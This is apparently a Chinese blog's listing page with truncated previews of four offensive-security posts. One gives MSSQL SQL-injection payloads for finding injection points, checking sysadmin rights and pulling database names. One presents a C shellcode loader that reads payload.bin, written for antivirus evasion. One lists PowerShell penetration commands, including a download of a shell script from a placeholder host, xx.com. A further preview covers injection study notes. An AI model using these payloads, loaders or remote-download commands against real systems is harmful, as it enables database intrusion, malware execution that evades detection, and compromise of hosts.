- 博客(4)
- 收藏
- 关注
RSS订阅原创 MSSQL注入流程,简洁
MSSQL注入日常使用的payload,遇到MSSQL注入,这些够用了,完整的在这里传送门拿数据的##判断注入点and user>0 --having 1=1-- ##判断权限,如果页面回显正常则为正确,否则报错and 1=(select IS_SRVROLEMEMBER('sysadmin')) --##获取当前数据库And 1=(select db_name()) --##获取当前数据库内的所有数据表and 1=convert(int,(select quotename
2021-02-28 16:00:46
698
原创 MSSQL注入笔记
最近在学习MSSQL注入,以前注入的知识全都忘记了,甚至连MSSQL语句都不认识了,非常尴尬,趁着周末有时间,便重新复习了一下,并写个笔记。写的比较乱,有时间再重新整理一下2021.2.28 15.48.55MSSQL基础知识SQL Server默认库的介绍初始库有4个mastermaster 数据库记录了所有的 SQL Server 数据库系统的系统级信息,如用户帐户,配置设置,并在所有其他数据库信息。 modelmodel 数据库是一个模板数据库。每当创建一个新的数据库(包括系统数据
2021-02-28 15:57:00
865
原创 C实现分离免杀
前期准备1.编译好mian.exe,源码如下#include <stdio.h>#include <windows.h>int main(int argc,char* argv[]){ //打开要执行的ShellCode文件 HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); if (hFile==INVALID_HANDLE_VALUE)
2021-02-28 15:40:43
2265
原创 powershell渗透常用命令
powershell渗透常用命令set-ExecutionPolicy RemoteSigned //开启执行策略set-ExecutionPolicy Restricted //关闭执行策略远程下载文件powershell$h=new-object System.Net.WebClient$h.DownloadFile('http://xx.com/payload/shell/h.sh','C:\Users\xx\Desktop\test\h.sh')命令行执行ps1文件powe
2021-02-28 15:19:27
1120
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人